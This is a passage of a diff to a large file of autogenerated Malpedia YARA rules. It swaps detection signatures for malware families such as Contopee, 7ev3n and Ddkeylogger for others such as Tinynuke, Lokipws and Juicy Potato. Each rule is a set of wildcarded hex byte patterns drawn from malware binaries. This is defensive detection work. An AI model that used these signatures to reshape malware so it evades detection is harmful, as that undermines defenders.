-		$sequence_4 = { 0f85a6000000 80fb41 0f849d000000 0fbef3 56 68???????? 8d45ec }
-		$sequence_5 = { ff15???????? ff75d2 ff15???????? 8945fc 8d8520feffff 50 897508 }
-		$sequence_6 = { 50 e8???????? 83c410 399d54ffffff 0f85a8faffff 53 }
-		$sequence_7 = { 7d1f 3c5d 741b 397dfc 7516 8b5d0c }
-		$sequence_8 = { ffb43578ffffff 8d85f8f8ffff 68???????? 50 e8???????? ffb4357cffffff e8???????? }
-		$sequence_9 = { ff742414 56 ff742418 ff742418 e8???????? 83c414 56 }
+		$sequence_0 = { 4885db 7409 48ffcb c6040300 75f7 488907 4885c0 }
+		$sequence_1 = { e8???????? 482be0 498bf9 498bd8 488bf2 488be9 4d85c0 }
+		$sequence_2 = { 8bd7 488bc8 e8???????? 4885c0 0f8467010000 3b7b0c 7f05 }
+		$sequence_3 = { e8???????? 85c0 7476 4d8bcf 4c8bc6 498bd6 488bcb }
+		$sequence_4 = { e8???????? 4c8b4308 4d85c0 7412 488d1571ac0900 448bcd 488bce }
+		$sequence_5 = { c705????????03000000 ff15???????? 488b0d???????? ff15???????? 48891d???????? 488b0d???????? 488d15fa070e00 }
+		$sequence_6 = { 41ff5248 eb27 ba8c000000 4c8d0d32660800 b906000000 448d420a c74424206c000000 }
+		$sequence_7 = { ffc1 48ffc0 3bca 7cf2 eb11 488d7001 448be5 }
+		$sequence_8 = { 7420 ffc3 3bde 7c95 4c8bac24a0000000 448be5 eb19 }
+		$sequence_9 = { ff4f30 488bcb e8???????? 488b7c2460 488bc3 488b5c2470 4883c468 }
 
 	condition:
-		7 of them and filesize < 2367488
+		7 of them and filesize < 2007040
 }
-rule MALPEDIA_Win_Contopee_Auto : FILE
+rule MALPEDIA_Win_Urausy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2c889060-56d8-5d54-aa2d-c629c52f97ce"
+		id = "d79fe72f-f8e2-58e2-a433-7994c2651777"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.contopee_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.urausy_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "5a1991aadc5915c8d606191fa7b0860d33c2887b1b0f8a8e7eb2cdfcb613029d"
+		logic_hash = "4006e3f78a3f573ba923955b3cfcab3f192d2740ed20a89eb62b4be1b215c9a4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -124962,32 +125250,32 @@ rule MALPEDIA_Win_Contopee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68???????? ffd5 8b0d???????? a1???????? 83c408 0bc8 7535 }
-		$sequence_1 = { 89461c 896e24 ff15???????? 83c418 85c0 7437 c7460801000000 }
-		$sequence_2 = { 52 55 ff15???????? 55 ff15???????? 8d442410 50 }
-		$sequence_3 = { 6a78 50 53 51 e8???????? 83c414 85c0 }
-		$sequence_4 = { 66392f 7502 33ff 8d442410 56 }
-		$sequence_5 = { c1e807 33d2 8a9094130110 8bc2 66ff848688090000 8b869c160000 8b96a0160000 }
-		$sequence_6 = { 89742430 c744242c01000000 89b42434010000 c784243001000001000000 ff15???????? }
-		$sequence_7 = { 81c632020000 6a02 56 e8???????? 83c408 b801000000 5f }
-		$sequence_8 = { 85c0 0f859a010000 8b442410 55 56 }
-		$sequence_9 = { 8bf7 8bfa 8d5568 c1e902 f3a5 8bc8 33c0 }
+		$sequence_0 = { e8???????? 33c0 c9 c20800 8d45ec 50 }
+		$sequence_1 = { 8d8500feffff 50 e8???????? 83f800 }
+		$sequence_2 = { ff75e4 e8???????? 8945e8 ff35???????? }
+		$sequence_3 = { 6894020000 ff75e8 ff75ec 6800000050 }
+		$sequence_4 = { e8???????? 8945e8 8945fc 68007f0000 6a00 e8???????? }
+		$sequence_5 = { 6a00 68???????? e8???????? 85c0 0f8461010000 }
+		$sequence_6 = { e8???????? 833d????????01 0f8599030000 68d4070000 ff35???????? e8???????? a3???????? }
+		$sequence_7 = { 68b80b0000 e8???????? c9 c20400 }
+		$sequence_8 = { 6a0f e8???????? 8945e4 8345ec61 8345e82d 6a00 ff35???????? }
+		$sequence_9 = { eb1b 3d57000780 7502 eb12 }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Comlook_Auto : FILE
+rule MALPEDIA_Win_Juicy_Potato_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2593fda3-f25f-5e4e-aea3-f7267ae6a193"
+		id = "8d631ed2-d4c1-50a7-a41e-e61bbdbf9578"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.comlook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.comlook_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.juicy_potato_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "f2d9544219cd4dfd907ec20f4f40e3ff7dc0abab6b393777aed6489d1acbc463"
+		logic_hash = "95a9bfa286d63983a17370c06426811d86dabf6e0c8c9f41f87914697070c991"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125001,32 +125289,32 @@ rule MALPEDIA_Win_Comlook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 68???????? 68???????? 8b4df8 8b5178 52 e8???????? }
-		$sequence_1 = { 8d15ec260810 e8???????? 58 5a 83c418 3bec e8???????? }
-		$sequence_2 = { c644241601 eb28 80be5006000000 740b 8bce e8???????? 84c0 }
-		$sequence_3 = { eb95 c745b4ffffffff c745a4ffffffff c745b800000000 c745a800000000 c78574ffffff00000000 eb0f }
-		$sequence_4 = { e9???????? 8d7c242c e8???????? b302 8d742424 885c2448 e8???????? }
-		$sequence_5 = { e8???????? 8b5308 895608 c645fc03 8d7e0c c70700000000 c7470400000000 }
-		$sequence_6 = { ffd0 3bf4 e8???????? 8945c8 837dc800 740a b804000000 }
-		$sequence_7 = { c781384a000000000000 8b5508 c782404a000000000000 8b45f8 50 8b4d08 51 }
-		$sequence_8 = { eb07 c745e000000000 8d4dd4 51 6800400000 8b550c 52 }
-		$sequence_9 = { eb0c 8b4d0c 8b510c 899558ffffff 8b4510 8b8d58ffffff 894808 }
+		$sequence_0 = { 488d15f58effff e8???????? 8d4701 8903 8b0b 8b4304 }
+		$sequence_1 = { 488b742460 488b7c2468 4883c440 415e c3 488d151af80100 }
+		$sequence_2 = { 488b13 4983c8ff 660f1f440000 49ffc0 6642390442 75f6 488d0dbffe0400 }
+		$sequence_3 = { 49ffc0 6642390442 75f6 488d0dbffe0400 e8???????? eb2e ffcf }
+		$sequence_4 = { 7411 488d05048c0400 483bc8 7405 }
+		$sequence_5 = { 4983e801 75e3 4d63ee 498bcd c7459f005d0000 c745a30000000a c745a700ffff00 }
+		$sequence_6 = { 7427 488b4c2438 488d15f6ee0200 ff15???????? 488bd8 4885c0 }
+		$sequence_7 = { 4c8bf1 8360b800 4c8d0d44880200 4c8d057d880200 33d2 }
+		$sequence_8 = { 8360b800 4c8d0d44880200 4c8d057d880200 33d2 488bcb e8???????? 488bf8 }
+		$sequence_9 = { 488d8d24030000 898520030000 e8???????? 488d0dc1c0feff 48c1e602 0fb784b950fc0300 488d9140f30300 }
 
 	condition:
-		7 of them and filesize < 4553728
+		7 of them and filesize < 736256
 }
-rule MALPEDIA_Win_7Ev3N_Auto : FILE
+rule MALPEDIA_Win_Scanline_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a2a11178-3257-5261-9f41-b916299315d7"
+		id = "13552250-a8d4-5ee7-b407-74524f6111b2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.7ev3n_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanline"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scanline_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "df56762186f095df1883a52e337f3ee36e53ef81834d91aa6fccabc217e84eca"
+		logic_hash = "2bc008243e0f7161ac1c675c6c0b345104d3837ab2d3042dba054ab6d07a500d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125040,32 +125328,32 @@ rule MALPEDIA_Win_7Ev3N_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 75f5 2bf9 d1ff 6a00 8d8558fdffff }
-		$sequence_1 = { b8ffff0000 0fb7c0 0fb7c0 0fb7f0 eb52 }
-		$sequence_2 = { 660fd68518e1ffff 0fb705???????? 66898520e1ffff f30f7e05???????? 660fd6850ce1ffff 0fb705???????? }
-		$sequence_3 = { 8bd0 8bf0 668b02 83c202 6685c0 75f5 8dbd38f9ffff }
-		$sequence_4 = { 660fd6850cf9ffff 0fb705???????? 66898514f9ffff f30f7e05???????? 660fd68500f9ffff 0fb705???????? 66898508f9ffff }
-		$sequence_5 = { 6a00 8d858ce8ffff 50 8d8dd0cdffff e8???????? 8bce 2bcf }
-		$sequence_6 = { d1ff 6a00 8d85e8f2ffff 50 8d8dd0cdffff e8???????? 8bce }
-		$sequence_7 = { 0f4305???????? a3???????? c3 b9???????? e8???????? 68???????? e8???????? }
-		$sequence_8 = { 85ff 7f17 7c05 83fe01 7710 0f57c0 660f1345e0 }
-		$sequence_9 = { 83c702 6685c0 75f5 2bf9 d1ff 6a00 8d85d8e1ffff }
+		$sequence_0 = { 68???????? e8???????? 017c2444 83c40c 03ef 4b 75e1 }
+		$sequence_1 = { 7435 8a1a 4e 42 80fb40 7205 }
+		$sequence_2 = { 8bf1 33c0 394508 898618060000 0f84d6000000 39450c 0f84cd000000 }
+		$sequence_3 = { e8???????? 59 33c0 59 c3 53 56 }
+		$sequence_4 = { ff750c 66c745ec0200 ff15???????? 668945ee 8b4508 8945f0 }
+		$sequence_5 = { f3a5 8bc8 83e103 f3a4 ff7304 e8???????? 8b45fc }
+		$sequence_6 = { 41 ebf7 49 890f 5f 5e 5b }
+		$sequence_7 = { 56 57 8bf1 ff15???????? 8be8 33db }
+		$sequence_8 = { 8d8db4f7ffff 897508 e8???????? 8d85c8feffff 56 50 ff15???????? }
+		$sequence_9 = { 7510 80a11703000000 c6811603000008 eb15 807c24040d 750e c681160300000d }
 
 	condition:
-		7 of them and filesize < 803840
+		7 of them and filesize < 151552
 }
-rule MALPEDIA_Win_Ddkeylogger_Auto : FILE
+rule MALPEDIA_Win_Chaperone_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3fb8455b-5bc3-5fd3-8427-a0f169965730"
+		id = "5a1a2e24-f819-52e0-8b1d-cbec80d9780c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkeylogger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ddkeylogger_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chaperone_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "fadbff39943f10b1213064afba0274f50487808fd2b1956572db1fecae4dc6f6"
+		logic_hash = "fb6f1141a2ad1ef091e8554a5e8c7b2e545fcb51cdc5087174343f9767f17bba"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125079,34 +125367,34 @@ rule MALPEDIA_Win_Ddkeylogger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 56 57 c745f8deb10000 c745fcae3c0000 }
-		$sequence_1 = { 8bc3 c1f805 8d3c8580ee4500 8bf3 }
-		$sequence_2 = { 85c0 752f 6804010000 8d85f8feffff }
-		$sequence_3 = { 7505 3b45fc 72bf 8a18 3a19 7501 40 }
-		$sequence_4 = { 6a00 6a00 56 8bf8 e8???????? 83c42c 57 }
-		$sequence_5 = { 8d9b00000000 8a08 40 84c9 75f9 8dbde8faffff 2bc6 }
-		$sequence_6 = { 56 ff15???????? 8bb5d8faffff 019ddcfaffff 6806030000 8d8de8faffff 6a00 }
-		$sequence_7 = { e8???????? 8d95b8faffff 52 52 }
-		$sequence_8 = { 8bc7 2bc1 0fb65901 881c08 0fb619 }
-		$sequence_9 = { c1eb06 03de 0fb61493 885102 0fb65002 83e23f 0fb61432 }
+		$sequence_0 = { 8b4c2458 488b442448 4803c1 4889442448 c644247833 c6442479c0 }
+		$sequence_1 = { b924000000 f3a4 488d4c2438 e8???????? 488d542438 488d4c2460 }
+		$sequence_2 = { 83c001 8944243c 8b442438 3944243c 0f8345010000 8b44243c 8b4c8440 }
+		$sequence_3 = { e8???????? 4889442428 488d7c2438 488d3547af0000 b924000000 f3a4 }
+		$sequence_4 = { e8???????? 41b801000000 488d542430 488b4c2468 }
+		$sequence_5 = { c78424c80100000b000000 488d542468 488b8c2480030000 ff15???????? 488905???????? }
+		$sequence_6 = { 85c0 740d 488b4c2420 0fb7442440 668901 488b4c2430 e8???????? }
+		$sequence_7 = { 33c0 eb68 c744243801000000 488b442430 }
+		$sequence_8 = { 33db 488bf8 48391d???????? 0f85d0000000 488d0d4fb50000 ff15???????? 488bf0 }
+		$sequence_9 = { c3 48895c2408 57 4883ec20 488d1da3940100 bf0a000000 }
 
 	condition:
-		7 of them and filesize < 808960
+		7 of them and filesize < 373760
 }
-rule MALPEDIA_Win_Attor_Auto : FILE
+rule MALPEDIA_Win_Tinynuke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "28ef2855-ea16-5908-a1e2-a1862e0a74d3"
+		id = "e047ea51-f3c4-5f88-b573-b37c1953b9b2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.attor_auto.yar#L1-L167"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinynuke_auto.yar#L1-L291"
 		license_url = "N/A"
-		logic_hash = "de7f5a512e50826529d9df83eea4ee3f508c57e991d51c9dd6e574d86869905a"
+		logic_hash = "6f2eccbfe290f185e4b6b9493a76e1eee7c900297614878527a2340fef27067f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -125118,40 +125406,56 @@ rule MALPEDIA_Win_Attor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f801 7411 3d81000000 740a }
-		$sequence_1 = { 4c8bce 89442420 ff15???????? 85c0 750a }
-		$sequence_2 = { 740f 33c9 e8???????? 488bce e8???????? 488b742458 4d85ed }
-		$sequence_3 = { 488d4c2458 4889442458 e8???????? 4839742440 7457 b101 }
-		$sequence_4 = { e8???????? 488b4c2430 4c8bc5 33d2 e8???????? 488b4c2430 4885c9 }
-		$sequence_5 = { 488b8c2490000000 e8???????? 48c784249000000000000000 4d85f6 740f }
-		$sequence_6 = { 48895c2440 e8???????? 4c8b6c2438 4c8bf8 488b442440 }
-		$sequence_7 = { eb78 33c0 488bcf 488907 48894708 48894710 48894718 }
-		$sequence_8 = { 0f84c3000000 6a02 56 50 ff15???????? 85c0 }
-		$sequence_9 = { 740a 83f808 7405 83f811 }
-		$sequence_10 = { 0f84cc020000 8d442438 897c2438 50 6a0c }
-		$sequence_11 = { 8d442420 8d4c2434 50 51 e8???????? }
-		$sequence_12 = { 6a00 e8???????? 8b54240c 52 }
-		$sequence_13 = { 56 ffd3 8944242c 8d542420 }
-		$sequence_14 = { 8b442410 c6400103 8b4c2410 66895902 }
-		$sequence_15 = { c1e902 f3ab 8bca 83c404 83e103 f3aa 8b44241c }
+		$sequence_0 = { c3 55 8bec 817d0c00040000 }
+		$sequence_1 = { 59 85db 7416 57 53 6aff }
+		$sequence_2 = { 3b750c 72e5 5f 5b 5e 5d c3 }
+		$sequence_3 = { ff35???????? a3???????? ff75f4 ff15???????? ff35???????? a3???????? ff75f4 }
+		$sequence_4 = { 8d45f8 50 56 57 ff35???????? ff75fc }
+		$sequence_5 = { 8d8530f6ffff 50 6802020000 ff15???????? 85c0 }
+		$sequence_6 = { 83c418 a3???????? 5f 5e 5b c9 c3 }
+		$sequence_7 = { 8945f4 8d85d4feffff 50 ff15???????? }
+		$sequence_8 = { ff75ec ff75fc e8???????? 83c40c 5f }
+		$sequence_9 = { ff35???????? 8d85a4feffff 50 ff15???????? ff35???????? 8d85a4feffff 50 }
+		$sequence_10 = { ff15???????? ff35???????? 8d85a8feffff 50 }
+		$sequence_11 = { c70604000000 e8???????? eb18 83f803 }
+		$sequence_12 = { ff15???????? a3???????? ff35???????? ff75f8 ff15???????? }
+		$sequence_13 = { a3???????? 68e2010000 68???????? 68???????? }
+		$sequence_14 = { eb18 83f803 7519 ff7608 }
+		$sequence_15 = { 3c0a 7409 3c0d 740f }
+		$sequence_16 = { 8b02 8a00 3c0a 7409 }
+		$sequence_17 = { 6a2a 50 8945fc ff15???????? }
+		$sequence_18 = { a3???????? ff35???????? ff75ec ff15???????? }
+		$sequence_19 = { 50 8d85d8feffff 50 ff15???????? ff35???????? }
+		$sequence_20 = { 8d85f0fdffff 50 ff15???????? ff75fc 8d85f0fdffff 50 e8???????? }
+		$sequence_21 = { 8d85f0fdffff 50 e8???????? 59 50 68???????? }
+		$sequence_22 = { ff15???????? 8b35???????? 8d430c 50 }
+		$sequence_23 = { 8b1d???????? 83fbff 7424 85db 740f ff149dc01de06e 83eb01 }
+		$sequence_24 = { eb10 8d04cd00000000 2bc1 8d0c45386d0210 }
+		$sequence_25 = { 85c0 75b7 8b7c241c 8b8780000000 }
+		$sequence_26 = { 89442404 e8???????? 83ec10 8b44241c }
+		$sequence_27 = { 83ec08 85c0 75d6 31db }
+		$sequence_28 = { 01d8 89442418 8b400c 85c0 745c 01d8 890424 }
+		$sequence_29 = { 81c2???????? 89542404 890c24 e8???????? }
+		$sequence_30 = { ff149dc01de06e 83eb01 8d7600 75f1 c70424???????? }
+		$sequence_31 = { e8???????? 83ec04 3c0c 7421 ffd3 }
 
 	condition:
-		7 of them and filesize < 2023424
+		7 of them and filesize < 1196032
 }
-rule MALPEDIA_Win_Boatlaunch_Auto : FILE
+rule MALPEDIA_Win_Acidbox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "17aecbbe-5b2a-5c30-99c2-803688504adb"
+		id = "ef6a2660-06bc-58c1-866c-71c4f81cb840"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boatlaunch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.boatlaunch_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.acidbox_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "1f8a4849474a78f820c262b22058fdfb27def9aa1bc7516915781a893805dbc5"
+		logic_hash = "41839e3e93fea6da491d6960f541c70a4bfe5cfb4dca07d8fcde4687922f61de"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -125163,38 +125467,32 @@ rule MALPEDIA_Win_Boatlaunch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d15a1190000 e8???????? e8???????? 488bd8 4885db 7468 }
-		$sequence_1 = { eb05 e9???????? 48837dc800 7412 488b0d???????? 33d2 4c8b45c8 }
-		$sequence_2 = { 488b4030 4883c408 c3 4855 4883ec20 488d6c2420 }
-		$sequence_3 = { 85c0 7501 ab 8bfe }
-		$sequence_4 = { c745f800000000 8d5ddc c70318000000 c7430400000000 c7430800000000 c7430c00000000 c7431000000000 }
-		$sequence_5 = { 7505 e9???????? 8bf8 6800010000 8d85e0eeffff 50 }
-		$sequence_6 = { e8???????? 3dffea2d66 7524 ff7344 e8???????? 3b05???????? }
-		$sequence_7 = { 4489442418 4855 53 51 }
-		$sequence_8 = { eb05 4b 85db 75ec }
-		$sequence_9 = { 8b487c 894de0 ff75e0 6a00 ff35???????? e8???????? }
-		$sequence_10 = { 56 57 4883ec08 488bec 488d35211e0000 }
-		$sequence_11 = { ff75f8 6a00 ff35???????? e8???????? 8945f4 8d45f8 50 }
-		$sequence_12 = { 85c0 7425 8d55f7 c70233c0c218 c6420400 6a00 }
-		$sequence_13 = { 4c8b4500 e8???????? 488b4508 488d6518 415b 415a 4159 }
-		$sequence_14 = { 52 56 57 4150 }
-		$sequence_15 = { 48ad 4885c0 740e 488bc8 e8???????? }
+		$sequence_0 = { bb0c010480 eb4b 41b800000206 413bd0 7322 483998a8000000 74e5 }
+		$sequence_1 = { 74d9 488b842420050000 488b8038010000 4885c0 750a bb0c130480 e9???????? }
+		$sequence_2 = { 881401 4401b3f4160000 664401b493bc000000 8b83f0160000 412bc6 3983f4160000 753e }
+		$sequence_3 = { c7442454ff000000 c7442458ccccf048 c744245c0000ffff c74424600fba2dcc c7442464ffffff00 c7442468cccccc00 }
+		$sequence_4 = { 498b07 488b5598 44896594 428834a0 498b07 488b75a8 46885ca001 }
+		$sequence_5 = { 897c2424 410fb74606 443be8 734f 488d9424d0010000 498bcf ff15???????? }
+		$sequence_6 = { 450f44d3 48894da0 ba01000000 412bf2 44895588 8bce 4403d6 }
+		$sequence_7 = { 83fe03 72da 8b477c 410fb7ce 83c6fd 410fb70442 664123c8 }
+		$sequence_8 = { c745d8fdffffff 4c8b7de0 eb1a 448bf2 8bf2 c7071c000000 c745d801000000 }
+		$sequence_9 = { 8bf7 49897ba0 448bff 49897bb0 }
 
 	condition:
-		7 of them and filesize < 33792
+		7 of them and filesize < 589824
 }
-rule MALPEDIA_Win_Seasalt_Auto : FILE
+rule MALPEDIA_Win_Lokipws_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e8758fcf-84ae-529e-8419-cd8aeff0784f"
+		id = "5db76a16-385c-53b6-855b-1bbc58a2e30f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.seasalt_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lokipws_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "5df2d6a2f6a4936e4945854f6bc4e70b294eb2b72f1c3ef6c84a2efa72215e6e"
+		logic_hash = "f7396cac0e0e8581cb9065a2315499eb607a41e3e7300cb035a34c55b22b36af"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125208,32 +125506,32 @@ rule MALPEDIA_Win_Seasalt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 f2ae f7d1 83c1f3 }
-		$sequence_1 = { eb02 33c0 0fbe84c660a20010 c1f804 83f807 }
-		$sequence_2 = { 40 3d00010000 7cef b950000000 }
-		$sequence_3 = { 8dbdd8fdffff 897de8 803f00 7433 }
-		$sequence_4 = { 89442420 b911000000 33c0 8d7c2424 f3ab }
-		$sequence_5 = { 0fb6fa 3bc7 7714 8b55fc 8a92c0cc0010 089001da0010 }
-		$sequence_6 = { 891d???????? c705????????03000000 8935???????? 8935???????? ffd7 }
-		$sequence_7 = { 896c2428 ffd6 8d4c2410 53 51 68???????? 68???????? }
-		$sequence_8 = { 8dbc2419020000 c684241802000000 f3ab 66ab 6a00 }
-		$sequence_9 = { 7765 ff2485f4130010 8b0d???????? 68???????? }
+		$sequence_0 = { 56 6a00 57 e8???????? 6a0c }
+		$sequence_1 = { e8???????? 33c0 83c418 40 c3 6a00 6a00 }
+		$sequence_2 = { 8945f4 8b4514 6a00 ff7518 8945f8 8d45f8 8365fc00 }
+		$sequence_3 = { 53 e8???????? 59 59 85c0 7564 8d8530ffffff }
+		$sequence_4 = { 56 57 6800040000 e8???????? c70424???????? be???????? 6a00 }
+		$sequence_5 = { 51 ffd0 33c0 50 50 57 }
+		$sequence_6 = { 58 6a66 5f 6a25 668945f6 33c0 668945fc }
+		$sequence_7 = { 895dec ff75fc c745f005000000 ff75f4 56 e8???????? 83c420 }
+		$sequence_8 = { 8b7810 8b5910 0f849e000000 83651000 8d7510 }
+		$sequence_9 = { 8bec 83ec0c 56 6a04 e8???????? 8bf0 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 1327104
 }
-rule MALPEDIA_Win_Torisma_Auto : FILE
+rule MALPEDIA_Win_Ssload_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c8b0e1d-5ff0-52a0-901d-e5a98754d385"
+		id = "f6ceb229-a7e1-5841-bcaa-d6789358d285"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.torisma_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ssload"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ssload_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "5f2db125f988ab78c395c9bd2de9be120817934423d4d9849c1bfeec7d230b1e"
+		logic_hash = "816793f1c924d2fa45e62fdcb0930a6aeafd4fdc18acca20a05a5227b74cb23d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -125247,35 +125545,38 @@ rule MALPEDIA_Win_Torisma_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7402 eb05 e9???????? b833280000 }
-		$sequence_1 = { e8???????? 3d514b0000 7504 33c0 }
-		$sequence_2 = { e8???????? 3d83490000 7507 b883490000 }
-		$sequence_3 = { 4889442458 488b442458 4889442430 488b4c2430 e8???????? }
-		$sequence_4 = { 50 ff15???????? 8b4dfc 51 6a40 ff15???????? 8945f8 }
-		$sequence_5 = { c1e91b 83e101 33d1 8b4508 8b4878 }
-		$sequence_6 = { 8b55f4 52 8b4da4 e8???????? }
-		$sequence_7 = { 83e101 c1e102 8b9424bc000000 0bd1 }
-		$sequence_8 = { 837c246800 740a 8b442430 89442438 eb08 }
-		$sequence_9 = { 89442430 488b442450 8b404c 83e001 }
-		$sequence_10 = { 817df404810200 760a b8514b0000 e9???????? 8b45f4 }
-		$sequence_11 = { b862000000 668945d2 b962000000 66894dd4 ba30000000 }
-		$sequence_12 = { 48894c2408 57 4881ecb0000000 48c7842488000000feffffff }
+		$sequence_0 = { 31d2 8944240c 662e0f1f840000000000 0f1f4000 3b6c2408 7306 }
+		$sequence_1 = { 04e3 89c1 89d8 bb3e000000 46 }
+		$sequence_2 = { 0fb66f01 0fb67702 0fb67f03 83e307 c1e312 }
+		$sequence_3 = { 0fb605???????? 84c0 0f8495010000 8b450c 85c0 7409 83f803 }
+		$sequence_4 = { 31c0 40 31ff 31db }
+		$sequence_5 = { 0fb7ce 25ff030000 c1e00a 81e1ff030000 }
+		$sequence_6 = { 31c8 31cf 29c8 19cf 3d10270000 }
+		$sequence_7 = { 31c0 40 81fd80000000 721b b802000000 81fd00080000 720e }
+		$sequence_8 = { 034a10 894de0 8b45e0 3b45dc 7606 8b4de0 894ddc }
+		$sequence_9 = { 034214 50 8b4df8 51 e8???????? }
+		$sequence_10 = { ffd1 83c408 ebbc 8b55fc 8b4208 50 e8???????? }
+		$sequence_11 = { 034110 50 8b550c 52 8b4de8 e8???????? }
